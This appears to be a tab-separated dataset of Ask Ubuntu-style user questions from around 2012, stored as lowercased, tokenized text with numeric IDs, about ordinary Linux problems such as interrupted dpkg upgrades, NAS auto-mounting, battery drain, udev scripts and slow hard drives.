163200	e : dpkg was interrupted ... run 'sudo dpkg -- configure -a '	i was running an upgrade with the apt-get command , and it was taking an exceptionally long time because half way through my isp hit me in the face with their fair usage policy . after sitting outside & watching the rain for awhile my electronics regained consciousness , so i went back to complete the upgrade and my terminal scolds me with '' e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . '' the last bit of legible info was all this : installing ( ri/rdoc ) documention for ( stuff and such ) error : could not find a valid gem 'watobo-0.9.8.724.gem ' ( > = 0 ) in any repository rm : can not remove `watobo-0.9.8.724.gem ' : no such file or directory setting up metasploit ( 4.3.0-bt1 ) ... upgrading pre-existing installation ... /opt/metasploit/postgresql/scripts/ctl.sh : postgresql ( pid 1191 ) already running prosvc is running metasploit is running [ * ] [ * ] attempting to update the metasploit framework ... [ * ] so on it goes for miles , talking about gem caches , rubies , & stuff i wish i had . all up until : a lib/gemcache/ruby/1.9.1/gems/state_machine-1.1.2/gemfiles/active_record-2.1.2.gemfile.lock ... and there it has sat , all night . if i stop it , will i still get the dpkg error ( on the off chance that i wo n't ) , or if so what do i need to to resume using apt-get commands and its super cow powers ?
163201	example of procedure for nas storage auto-mounting	in windows , i used to `` map network drive '' and voila , it worked and was there when i started . this is what i would like to happen on ubuntu , with a slight twist . i 'd like to , shall we say , `` remap '' , my home folders /home/user/video /home/user/pictures/ /home/user/downloads/ /home/user/ ... ( insert useful name here ) to their actual location on my nas . i 'm using a goflex home storage device ( if that makes a difference ) . so , when i start-up , and go to /home/user/pictures/ i 'm actually going to /nas/storage/path/to/pictures/ i 'm not familiar with the path structures of linux , so if you say `` add x '' to your `` y '' you should be including where i can find y . bonus points : a secondary issues i 'm having right now is that video 's seem to stop after 2-5 seconds of viewing when i watch them over afp , not sure if this is the same protocol that is used to mount but that 's an additional problem . here 's what i 've tried so far , editing /etc/fstab but sudo mount -a says `` go fstab yourself '' . //192.168.0.13/goflex\040home\040personal/pictures /home/brandon/pictures cifs username=bbertelsen , password=**** , _netdev , uid=brandon 0 0 //192.168.0.13/goflex\040home\040personal/music /home/brandon/music cifs username=bbertelsen , password=**** , _netdev , uid=brandon 0 0 //192.168.0.13/goflex\040home\040personal/downloads /home/brandon/downloads cifs username=bbertelsen , password=**** , _netdev , uid=brandon 0 0 //192.168.0.13/goflex\040home\040personal/videos /home/brandon/videos cifs username=bbertelsen , password=**** , _netdev , uid=brandon 0 0 one time mounting seems to work exactly as i would expect it to . sudo mount -t cifs '//192.168.0.13/goflex home personal/pictures ' /home/brandon/pictures -o username=bbertelsen , password=**** , iocharset=utf8 , file_mode=0777 , dir_mode=0777
163205	vlc icon in tray multiple times	so , when i start watching a video or something of the like , vlc puts a nice little icon in the tray . the problem is , that when i open and close vlc it keeps adding another nice little icon in the tray . here 's a ss for example 's sake .
163206	terminal windows do n't show up in alt-tab	i 've seen a few of the other questions regarding this topic , and the suggestion to install compiz-settings-manager and select application switcher worked , it just showed both application switchers over each other . is there another work-around ?
163209	ubuntu 12.04 battery problem	i have my laptop ( dell inspiron 14r ) on dual boot with ubuntu 12.04 and windows 7 . while using windows 7 , i used to get about 2.5-3 hours on battery fully charged ( with my cellphone connected for 3g internet ) . the battery is almost 2 years old . but in ubuntu 12.04 , i 'm getting only about 1-1.5 hrs on battery . i tried installing jupiter , also tried some tweaks that were mentioned in the forums , like editing the grub file . but nothing seems to work . i am not sure if any app is draining the battery . the one application that i use always is firefox . it 's always open . is there any way i could get at least 2.5 hrs of battery time ?
163215	awesome window manager on startup	i 've installed awesome window manager on ubuntu 12-04 i have followed these instructions to set it up . it works correctly . i am now trying to add some shell commands to be run at startup . [ swapping mouse buttons round & stopping the display turning off when idle ] . i have these commands stored in the .xsession file and i have .xinitrc sym linked to .xsession . the commands in .xsession are not being executed . how can i make these commands run ? are they in the wrong place ? i thought awesome was an extension to xwindows and so it would run ~/.xsession when it starts up . but it is n't doing . andy @ : ~ $ cat ~/.xsession xmodmap -e `` pointer = 3 2 1 '' setterm -blank 0 -powersave off -powerdown 0 xset s off
163220	how to safely uninstall alternative package version ?	sometime ago , i installed s3tc packages via ppa to get the most updated package version . but now i want to uninstall it and get back the `` standard '' ubuntu package version . when i tried to remove it via synaptic , it returned various other dependent packages that will be remove with the uninstallation . how can i uninstall just this package ?
163225	how do i install new intel hda sound drivers ?	in certain cases i might have an older kernel or release of ubuntu where my sound driver might be too old or buggy , how can i get updated sound drivers for my built in intel audio chip ?
163227	why does n't my usb 3.0 pci-e card work ( via chipset ) ?	i have a logilink pcie usb3.0 interface in my computer . unfortunately there are no drivers available at the website of logilink . is there any possibility to use this interface on ubuntu ?
163228	how do invert my touchpad 's orientation ?	i am looking to completely reverse the orientation of an external touchpad ( logitech wireless touchpad ) . this is not just inverting the scrolling : i want to turn it `` upside-down '' with the click buttons on top and use it as normal . i found this thread about the apple magic trackpad on mac but no luck on linux . i 'm using 12.04 if that matters .
163232	why does installing a mainline kernel give me a purple screen ?	i think it has something to do with the fact that i just installed kernel 3.5 because it stopped working after this . i ca n't even get to the login . i do n't know how to get into recovery mode or grub mode . i 'm running ubuntu desktop as well as windows 7 . can somebody help me please ?
163233	scheduled backups : local & ftp	please forgive if this has been asked/answered before , but i am an ubuntu noob . i need to perform 2 types of backups automatically on a weekly schedule : from one local drive to another from a remote ftp to a local drive need to backup new/changed files only ( possibly a mirror mode : delete files that do n't exist on the source ) . no need to encrypt/archive - simple copy files/folders as is . need to send a email on backup completion with the operation summary . what 's the best software/easiest way to do it ? preferable using gui interface . thanks !
163236	how do i change the default permissions of home directories created with adduser ?	how can i change the default chmod of new home directories ( created with adduser ) ?
163240	how to delete old devices from the ubuntu one device list ?	i have had several virtual box and other installations on old computers that i have used to access a common set of files but it seems i can only delete the currently connected device but not the obsolete ones that often no longer exist or have crashed and needed a reinstall . this generates a new device name each time , but the old ones can no longer be deleted . i 'm sure i did have this option before but now only the `` currently connected '' device can be removed from the list which seems silly if the one i want to remove does n't exist anymore . please help me with this before it gets out of hand .
163241	my cpu fan stop working on dell inspiron 1545	after installing ubuntu 12.04 my cpu temperature gets abnormally high : 80-86 째c . i saw that the cpu fan is n't running . is it possible for this problem to be caused by ubuntu or not ?
163246	how do i install windows 7 on a lenovo thinkpad running 12.04 ?	how do i install windows 7 enterprise on a lenovo thinkpad running ubuntu 12.04
163248	no launchpad project set , leave blank to abort . quickly	create project : https : //launchpad.net/randomazer input : quickly submitubuntu . error : launchpad connection is ok no launchpad project set , leave blank to abort .
163251	how do i install bumblebee on nvidia 540m in 12.04 ?	i am new to linux ( `` ubuntu '' ) and have been using windows until now . i have decided to try ubuntu out since version 11 however my laptop is a msi with the gt540 nvidia optimus . i have tried several methods to get the desktop use the nvidia card but could never get it working . finally , i decided to upgrade to 12.04 . it works great but again i ca n't get the card to work 100 % . i have made headway though , using some how-to 's , i can run glxspheres in with the optimus command but what do i do from here ? the desktop does not work and i ca n't run glxgears . i have used the bumblebee way but do n't know the version . any help please ?
163256	how do i burn the ubuntu iso on mac os x lion ?	i downloaded the ubuntu 12.04 desktop iso and i 'm trying to burn it to a disc to install onto a windows vista laptop but it keeps giving me an error saying that it could n't be burned properly because there are `` no mountable file systems '' anybody know what to do to fix this issue ?
163259	why does the ubuntu password screen take longer on a wrong password ?	i noticed that a check on a good password takes ~.5 seconds . however , if you give a password that is incorrect , it takes ~3 seconds to inform the user as such . why is this ?
163264	how can i reduce the cpu usage of x/lightdm ?	running xubuntu 12.04 on a netbook ( lenovo s10 ) , the lightdm process which runs in the background takes up constantly a precious 12 % of the cpu . besides , this consumes a considerable amount of energy , and the battery life already is n't that good . the process i am referring to is shown in htop as this command : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none why is this process necessary ? is there a way to reduce its processor usage ?
163268	move all files in several folders	so i unzipped a file with 1000+ folders , is there a way to `` flatten '' these folders ? as in , grab all the contents from every folder and dump them into another directory .
163271	network fails when rebooting	i 've installed ubuntu 12.04 server with lxde installed onto it . my computer is a hp pavilion ze2000 which happens to have the broadcom wireless card . [ output ] : lspci -nn | grep 14e4 05:02.0 network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 ) i was eventually able to get the wireless connection working but it does not persist after rebooting . with ethernet cable unplugged : if i do sudo ifconfig wlan0 up then do sudo /etc/init.d/networking restart it freezes and eventually does not start the network ( in this case it seems to be doing the same thing it does during boot ) . however , if i do sudo ifconfig wlan0 up , then plug in the ethernet cable , then do sudo /etc/init.d/networking restart it fires right up and connects to the wireless . in that latter case , it connects to the wireless even though the ethernet cable is still plugged in . then i can unplug the enthernet cable and still be connected wirelessly ( unless i reboot ) . it looks like all the same modules are loaded both before and after . does anyone have some clues where to look for the problem ?
163275	setting the /home partition in a drive through a lan	i want to install ubuntu and i would like to set my /home partition in an external usb hard drive that is directly connected to my router , and access my data through the lan connection . can it be done ?
163278	how do i set the framebuffer resolution for nvidia on 12.04 ?	so , 12.04 x86_64 is installed and working properly . i see grub and plymouth , then lightdm , x session for unity is good . my framebuffer resolution for tty1-6 is 1280x1024 . x is 1680x1050 . i can use fbset to manually change the fb resolution to the desired 1280x800 . then to make it stick for all future settings , i changed the resolution in /etc/default/grub and /etc/initramfs-tools/modules . i then ran update-grub2 and update-initramfs -u , rebooted , but it is still in 1280x1024 . where am i going wrong ? system 12.04 ( x86_64 ) nvidia driver version : 295.49 fb0 modes : u:1280x800p-60 u:640x480p-67 v:1280x1024p-75 v:1280x1024p-60 v:1024x768p-75 v:1024x768p-70 v:1024x768p-60 v:800x600p-75 v:800x600p-72 v:800x600p-60 v:800x600p-56 v:640x480p-72 v:640x480p-60 u:1280x800p-60 u:320x240p-60 u:320x400p-59 u:320x200p-59 u:1280x1024p-59 u:1024x768p-60 u:800x600p-59 u:640x480p-60 u:640x400p-59
163282	how to scan a folder with avg via the command line ?	i 'm running avg anti virus on linux and i 'm using only the terminal . so sudo avgscan / -a -h -c scans the whole disk , is there a way to scan just a specified folder ( also scans for the folders within said folder ) ?
163283	why do i get a blank screen after installing ubuntu ?	i installed ubuntu 12.04 erasing a windows vista install . the install went through to completed and reported success and instructions indicated that i should reboot . upon reboot , post the bios screen , i get a blank screen with a blink cursor and nothing else is happening . how do i get the bios to boot up ubuntu 12.04 ? i can boot up from the ubuntu cd , but am unable to boot up from the local disk . appreciate any help . thx .
163296	is there a simple way with pygi to make an entire window a drop target for external input ?	example : drop a file in a glade designed window and it triggers handler.open_from_path ( path )
163298	what 's a simple way to recompile the kernel ?	i 'm interested in compiling a new kernel under ubuntu 12.04 x86 64 bit . i found this wiki page which is basically a mirror for this blog and there are a lot of steps ( git , etc . ) that appear useless to me . with earlier releases/distros , i used to create a .config file and modify a makefile if i needed to , then just run make and it 's done . is there is a simple way to do this under ubuntu ?
163302	installation from usb stick on uefi-based system	how can i install ubuntu from usb stick on a uefi-based x86-64 system ? documentation for this topic does n't look very friendly .
163304	which device drivers are built into the kernel ?	i recently installed a vendor supplied embedded linux onto a hardware device . when i ran lsmod on the device command line the response was empty . i was lead to believe that this means that the drivers for the hardware running on the device had been built into the kernel rather than as .ko files . my question is this : how does this process happen ? is support for popular hardware gradually integrated into the kernel in subsequent versions thus replacing the .ko files ? is the .ko file simply used to support new hardware that does n't have kernel integrated driver support at the time of release ? in my limited knowledge i thought that all hardware drivers were of the form of .ko files but clearly this is wrong . i am slightly confused by the whole process and would be grateful for clarification as i have a feeling that i may be looking at the situation the wrong way .
163314	how to make a backup of windows os	how to make a complete operating system backup of windows without anything missing , to switch it to a different hard drive ? a complete personal usable backup without using untrusted software , exactly like original .
163316	what is the easiest way to reset a configuration file that i accidentally deleted ?	i have accidentally deleted a configuration file ( /etc/pptpd.conf ) and was wondering what would be the best way to recover the default configuration file that comes with the pptpd package . is there a way to `` checkout '' a single file from a package ?
163319	how do i remove the accessibility options/icon from the login screen ?	have young kids that manage to foul up ubuntu by playing with the universal access options at the login screen . tried following the directions for 10.04 but the stated directories do n't exist in 12.04 how can i completely remove the universal access options from the login screen from ubuntu 12.04 ?
163323	external usb audio interface has weird noises	i have an e-mu tracker pre usb 2.0 connected to a usb hub . it works perfectly in windows xp on the exact same computer , but has weird noises in ubuntu 11.10 . while being turned on , the system can recognize it and automatically set it as the default output device , but there are some fuzzy noises along with the music playing , no matter in chrome , or in foobnix player . i wonder if anybody having an external audio interface experience similar problems ? is it because of the driver ? thanks a lot in advance . here is more info showing in alsa , noted that e-mu tracker pre supports 44.1khz/48khz playback ~ $ cat /proc/asound/usb/pcm0p/sub0/hw_params access : mmap_interleaved format : s24_3le subformat : std channels : 2 rate : 44100 ( 44100/1 ) period_size : 44100 buffer_size : 88200 in foobnix player , the 44.1khz music wo n't be resampled to 48khz , while in chrome the resampling does happen , so i am guessing the weird noise is not caused by resample . i wonder if anyone using emu-0202/0404 usb experiencing a similar problem .
163328	more than four minutes to boot up my ubuntu 12.04 . what could be the problem ?	i can not tell exactly when this happened , but surely after upgrading to ubuntu 12.04 , but on my last bootup it lasted from selecting the distro on the grub menu to full usability 4 minutes 22 seconds to boot ! ( not taking account of the time that i type the password on login screen ) . a few things to clarify : 1 ) this never happened before 12.04 . 2 ) i have a hdd with 2 partitions : a ) an ntfs where w. xp sits b ) an extended partition where there are three logical partitions i ) a 19 gb where the filesystem sits ii ) the linux swap iii ) an ntfs partition 3 ) i know that this could be solved like making a fresh install or such but i still trying to find a way to fix this without reinstalling anything . supplementary data : here 's the bootchart link heres the boot.log here 's the kern.log here 's the syslog
163335	ca n't boot from live cd to fix grub problem	i have a dual boot of win7 and ubuntu on my hp laptop . i upgraded from ubuntu 11.10 to 12.04 today and on restart i got a different black grub screen instead of the usual purple one . ( gnu grub version 1.99-21ubuntu3.1 ) each boot option only returns error messages . error : no such partition . i read on some other posts that i should make a live cd and boot there to use the boot repair tool but my laptop wont boot from the disk . i have changed the bios setting so that boot from disk is first and also tried telling it to boot from cd in the startup menu . each time i restart however the cd drive starts to run and then the grub menu appears . the cd runs fine on another laptop and is the correct 64bit version .
163336	bison cam does not work with ubuntu	my bison camera does not work with ubuntu . is there any bison cam driver for ubuntu ?
163340	how to install fedora 17 over ubuntu 12.04 lts	i have been using ubuntu since ubuntu 11.10 came out . i was very satisfied with how ubuntu has evolved over the past few years , but now i would like to try out fedora 17 since that has been out for a while simply for a change . i first had windows 7 and ubuntu on a dual boot ; however , i got rid of the dual boot and installed ubuntu 12.04 ( 32-bit recommendation ) from a cd as my primary operating system . my problem is , now that ubuntu 12.04 lts is my primary operating system , how can i install fedora 17 in its place ? i downloaded the fedora 17 iso file ( 64-bit ) and installed it on both a cd and usb , but i can not get it to run from either . i investigated the problem and tried going into my bios by pressing f2 to make the usb the primary boot ; however , this did n't work either . when i put the usb first in boot order , i receive a message that states `` bootmgr is missing , press ctl+alt+del to restart '' . i 've searched all over the internet in hopes of figuring out a way to fix this , but to no avail . also , i have tried pressing f12 to pick the cd to boot from , but this option is nonexistent ( i remember when i had windows 7 that it was an option though ) . if anyone needs any more information about my situation , please do n't hesitate to ask . if it helps at all , i 'm working with a lenovo ideapad z560 . also , let me make it clear that i want to remove ubuntu 12.04 lts from my laptop completely and replace it with fedora 17 ; i do not want a dual boot of fedora and ubuntu .
163347	how to stop bash prompt colours from escaping	i 'm trying to configure bash to display the current git branch , based off the example here , but i ca n't figure out how to get bash to stop escaping the colour strings . everything i try results in the colour strings being outputted in the prompt line . my prompt looks like this : valorin @ gandalf : ~/workspace/wyoa ( \ [ \033 [ 0 ; 31m\ ] master\ [ \033 [ 00m\ ] ) $ the relevant section in .bashrc : # # # custom git branch name in prompt # # function git_prompt { if ! git rev-parse -- git-dir > /dev/null 2 > & 1 ; then return 0 fi git_branch= $ ( git branch 2 > /dev/null| sed -n '/^\*/s/^\* //p ' ) if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then if git diff -- quiet 2 > /dev/null > & 2 ; then echo `` ( \ [ \033 [ 0 ; 31m\ ] $ git_branch\ [ \033 [ 00m\ ] ) '' else echo `` ( \ [ \033 [ 0 ; 33m\ ] $ git_branch\ [ \033 [ 00m\ ] ) '' fi else if git diff -- quiet 2 > /dev/null > & 2 ; then echo `` ( $ git_branch ) '' else echo `` ( $ git_branch* ) '' fi fi } if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] $ ( git_prompt ) $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w $ ( git_prompt ) \ $ ' fi any help would be appreciated .
163349	why ca n't i install from ppas ?	just new in using ubuntu , just installed it last night . i having a trouble installing apps using the terminal . when i try to install this : sudo add-apt-repository ppa : scopes-packagers/ppa sudo apt-get update sudo apt-get install unity-lens-utilities unity-scope-calculator or this : sudo add-apt-repository ppa : tualatrix/ppa sudo apt-get update sudo apt-get install ubuntu-tweak i get this : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.wxek84wp5f -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv fe85409eeab40eccb65740816af0e1940624a220 gpg : requesting key 0624a220 from hkp server keyserver.ubuntu.com gpg : key 0624a220 : `` launchpad ppa for tualatrix '' not changed that goes for all other apps that i want to install . any advice guys ? ? ? thanks in advance !
163350	wrong disk usage report on /	i asked this on stackoverflow , but maybe here is a better place . on my ubuntu 11.10 , /dev/sda3 ( 150gb ) is mounted on / and /dev/sda1 ( 80gb ) is mounted on /home . my entire disk has 250gb and the system is reporting i am running out of disk space . here is the output of df -h : filesystem size used avail use % mounted on /dev/sda3 149g 141g 0 100 % / udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 1.6g 860k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 508k 3.9g 1 % /run/shm /dev/sda1 74g 15g 56g 21 % /home ubuntu disk usage analyzer report the same thing . but this is weird because i believe i never used that much space on / . i also check every individual directory under / ( exclude /home ) , and they do n't use that much space : 8.8m bin 4.0k dev 0 initrd.img 0 initrd.img.old 828m lib 15m lib32 4.0k lib64 4.0k media 0 proc 9.2m sbin 0 sys 1.1g var 108m boot 18m etc 4.0k mnt 40k root 4.0k selinux 72k tmp 0 vmlinuz 0 vmlinuz.old 16k lost+found 133m opt 1004k run 4.0k srv 5.9g usr any one could give me some idea what is using up the space ? thanks in advance . one thing to add is that i turned the ufw log to full , then i noticed some extreme large log files . but i deleted the log files and turned the ufw log to low again . not sure if that 's the problem .
163353	unity wikipedia-like wiktionary lens	hey guys i tried to create a wiktionary lens using this template , apparently it is n't as easy as i thought i would be . http : //developer.ubuntu.com/2012/04/how-to-create-a-wikipedia-unity-lens-for-ubuntu/ i 'm trying to create a lens that allows me to search on the hud for a definition on the german wiktionary , or any wiktionary using the locale option . i 'm not a python programmer , but i 'd appreciate any asistance on the subject . by the way , here 's the code if you 're interested , it installed well , but it does n't work . import logging import optparse import urllib2 import simplejson import gettext from gettext import gettext as _ gettext.textdomain ( 'wiktionary ' ) from singlet.lens import singlescopelens , iconviewcategory , listviewcategory from wiktionary import wiktionaryconfig class wiktionarylens ( singlescopelens ) : wiki = `` http : //de.wiktionary.org '' def wiktionary_query ( self , search ) : try : search = search.replace ( `` `` , `` | '' ) url = ( `` % s/w/api.php ? action=opensearch & limit=25 & format=json & search= % s '' % ( self.wiki , search ) ) results = simplejson.loads ( urllib2.urlopen ( url ) .read ( ) ) print `` searching wiktionary '' return results [ 1 ] except ( ioerror , keyerror , urllib2.urlerror , urllib2.httperror , simplejson.jsondecodeerror ) : print `` error : unable to search wiktionary '' return [ ] class meta : name = 'wiktionary' description = 'wiktionary lens' search_hint = 'search wiktionary' icon = 'wiktionary.svg' search_on_blank=true # todo : add your categories articles_category = listviewcategory ( `` articles '' , `` dialog-information-symbolic '' ) def search ( self , search , results ) : for article in self.wiktionary_query ( search ) : results.append ( `` % s/wiki/ % s '' % ( self.wiki , article ) , `` http : //upload.wikimedia.org/wikipedia/commons/f/f8/wiktionary-logo-en.svg '' , self.articles_category , `` text/html '' , article , `` wiktionary article '' , `` % s/wiki/ % s '' % ( self.wiki , article ) ) pass thanks in advance .
163358	how to sort lines in a text file from the terminal ?	i have to sort the gpa in a file for my class lab . the teacher uses putty , for those of us that chose to use ubuntu in the class , we have no idea how to do the command for ascending sort and descending sort .
163363	how do i disable window shadows in unity on 12.04 ?	it appears that regardless what i set in the shadow window field in windows decoration preferences , compiz ignores the setting and would still draw shadows under windows . what i set in the field seems to only affect other elements like menus and tool tips . also , i 've rid all the shadow tags in the theme i 'm using so i 'm pretty sure the shadow is n't coming from the theme itself . is this a bug or by design ?
163369	auto-run script when ipad plugged in	the way that ubuntu handles documents on the ipad is awesome ( without any configuration required ) . it beats windows , even with itunes installed . i want to have the documents in certain ipad apps automatically synced into my dropbox directory whenever the ipad is connected by usb . the syncing is easy ; getting the script to run is not . i have already read the information in various ( very out-of-date ) tutorials . the best i could find was here : http : //askubuntu.com/a/25091/16157 i used lsusb , with the following results : bus 002 device 012 : id 05ac:12a2 apple , inc. ( please note that when an ipad is connected , ubuntu seems to mount it to two different mount points : one for `` documents '' and one for the whole ipad filesystem . they are both mounted in ~/.gvfs ) i have created the following file /etc/udev/rules.d/96-ipad_sync.rules i have tried this : action== '' add '' , attrs { idvendor } == '' 05ac '' , attrs { idproduct } == '' 12a2 '' , run+= '' /home/kit/bin/jobdone2 '' and also this : action== '' add '' , attr { idvendor } == '' 05ac '' , attr { idproduct } == '' 12a2 '' , run+= '' /home/kit/bin/jobdone2 '' ~/bin/jobdone2 is a script that plays an mp3 file . i have tested that it works ( by using alt+f2 and then typing ~/bin/jobdone2 ) . so far , when i plug the ipad in , nothing happens . this is the output i get from typing udevadm monitor âenv kernel [ 29348.114010 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4 ( usb ) kernel [ 29348.114844 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0 ( usb ) kernel [ 29348.129118 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0 ( usb ) kernel [ 29348.130699 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:4.0 ( usb ) kernel [ 29348.130845 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:4.1 ( usb ) kernel [ 29348.130909 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:4.2 ( usb ) udev [ 29348.163861 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4 ( usb ) udev [ 29348.170390 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0 ( usb ) udev [ 29348.171521 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:4.1 ( usb ) udev [ 29348.172230 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0 ( usb ) udev [ 29348.172890 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:4.2 ( usb ) udev [ 29348.175645 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:4.0 ( usb )
163370	hdd performance is slow in ubuntu	i am running ubuntu 12.04 ( 32 bit ) . suddenly after a reboot my laptop did not detect hdd . after couple of restart it failed to detect hdd . then i change sata mode to ide from ahci in bios . then it detect hdd again . and now hdd performance is very slow . i run a short test in disk utility . it shows no error or warning . hdparm -i /dev/sda model=toshiba mk3259gsxp , fwrev=gn003j , serialno=61ojc86ct config= { fixed } rawchs=16383/16/63 , trksize=0 , sectsize=0 , eccbytes=0 bufftype=unknown , buffsize=8192kb , maxmultsect=16 , multsect=16 curchs=16383/16/63 , cursects=16514064 , lba=yes , lbasects=625142448 iordy=on/off , tpio= { min:120 , w/iordy:120 } , tdma= { min:120 , rec:120 } pio modes : pio0 pio1 pio2 pio3 pio4 dma modes : sdma0 sdma1 sdma2 mdma0 mdma1 mdma2 udma modes : udma0 udma1 udma2 udma3 udma4 *udma5 advancedpm=yes : unknown setting writecache=enabled drive conforms to : unspecified : ata/atapi-3,4,5,6,7 hdparm -tt /dev/sda /dev/sda : timing cached reads : 2 mb in 2.70 seconds = 759.55 kb/sec timing buffered disk reads : 172 mb in 3.02 seconds = 56.99 mb/sec these are the result of hdparm command . does it normal ? please help . specification : laptop : acer aspire 4250 hdd : 320 ram : 2gb processor : dual core ( 1.6ghz ) edited i found something . after some ideal time sda link goes down ( speed 700 kb/sec ) . it 's back after a minitue ( speed in mb/sec ) . kernel log : 1.194927 ] ahci 0000:00:11.0 : version 3.0 jul 14 01:07:32 ubuntu kernel : [ 1.195121 ] ahci 0000:00:11.0 : ahci 0001.0200 32 slots 4 ports 6 gbps 0xf impl sata mode jul 14 01:07:32 ubuntu kernel : [ 1.196190 ] scsi0 : ahci jul 14 01:07:32 ubuntu kernel : [ 1.196326 ] scsi1 : ahci jul 14 01:07:32 ubuntu kernel : [ 1.196417 ] scsi2 : ahci jul 14 01:07:32 ubuntu kernel : [ 1.196508 ] scsi3 : ahci jul 14 01:07:32 ubuntu kernel : [ 1.196951 ] ata1 : sata max udma/133 abar m1024 @ 0x9034b000 port 0x9034b100 irq 19 jul 14 01:07:32 ubuntu kernel : [ 1.196957 ] ata2 : sata max udma/133 abar m1024 @ 0x9034b000 port 0x9034b180 irq 19 jul 14 01:07:32 ubuntu kernel : [ 1.196961 ] ata3 : sata max udma/133 abar m1024 @ 0x9034b000 port 0x9034b200 irq 19 jul 14 01:07:32 ubuntu kernel : [ 1.196965 ] ata4 : sata max udma/133 abar m1024 @ 0x9034b000 port 0x9034b280 irq 19 # jul 14 01:07:32 ubuntu kernel : [ 1.528890 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) # jul 14 01:07:32 ubuntu kernel : [ 1.528970 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) # jul 14 01:07:32 ubuntu kernel : [ 1.701010 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) jul 14 01:07:32 ubuntu kernel : [ 2.172883 ] switching to clocksource tsc jul 14 01:07:32 ubuntu kernel : [ 3.380557 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) jul 14 01:07:32 ubuntu kernel : [ 3.424635 ] ata1.00 : ata-8 : toshiba mk3259gsxp , gn003j , max udma/100 jul 14 01:07:32 ubuntu kernel : [ 3.424644 ] ata1.00 : 625142448 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa jul 14 01:07:32 ubuntu kernel : [ 3.425731 ] ata1.00 : configured for udma/100 jul 14 01:07:32 ubuntu kernel : [ 3.426226 ] scsi 0:0:0:0 : direct-access ata toshiba mk3259gs gn00 pq : 0 ansi : 5 jul 14 01:07:32 ubuntu kernel : [ 3.426483 ] sd 0:0:0:0 : [ sda ] 625142448 512-byte logical blocks : ( 320 gb/298 gib ) jul 14 01:07:32 ubuntu kernel : [ 3.426488 ] sd 0:0:0:0 : [ sda ] 4096-byte physical blocks jul 14 01:07:32 ubuntu kernel : [ 3.426550 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 jul 14 01:07:32 ubuntu kernel : [ 3.426568 ] sd 0:0:0:0 : [ sda ] write protect is off jul 14 01:07:32 ubuntu kernel : [ 3.426574 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 jul 14 01:07:32 ubuntu kernel : [ 3.426608 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua jul 14 01:07:32 ubuntu kernel : [ 3.537077 ] sda : sda1 sda2 sda3 sda4 < sda5 sda6 sda7 > jul 14 01:07:32 ubuntu kernel : [ 3.538831 ] sd 0:0:0:0 : [ sda ] attached scsi disk jul 14 01:07:32 ubuntu kernel : [ 3.540782 ] scsi 1:0:0:0 : cd-rom matshita dvd-ram uj8b0aw 1.00 pq : 0 ansi : 5 jul 14 01:07:32 ubuntu kernel : [ 3.542788 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray jul 14 01:07:32 ubuntu kernel : [ 3.542796 ] cdrom : uniform cd-rom driver revision : 3.20 jul 14 01:07:32 ubuntu kernel : [ 3.543116 ] sr 1:0:0:0 : attached scsi cd-rom sr0 jul 14 01:07:32 ubuntu kernel : [ 3.543254 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 jul 14 01:07:32 ubuntu kernel : [ 3.543485 ] freeing unused kernel memory : 748k freed i am having exactly the same problem , https : //answers.launchpad.net/ubuntu/+source/linux/+question/166624 added info smartctl 5.43 2012-06-05 r3561 [ i686-linux-3.5.0-3-generic ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : toshiba 2.5 '' hdd mk..59gsxp ( adv . format ) device model : toshiba mk3259gsxp serial number : 61ojc86ct lu wwn device id : 5 000039 353c09e33 firmware version : gn003j user capacity : 320,072,933,376 bytes [ 320 gb ] sector sizes : 512 bytes logical , 4096 bytes physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : sun jul 15 00:36:16 2012 bdt smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . 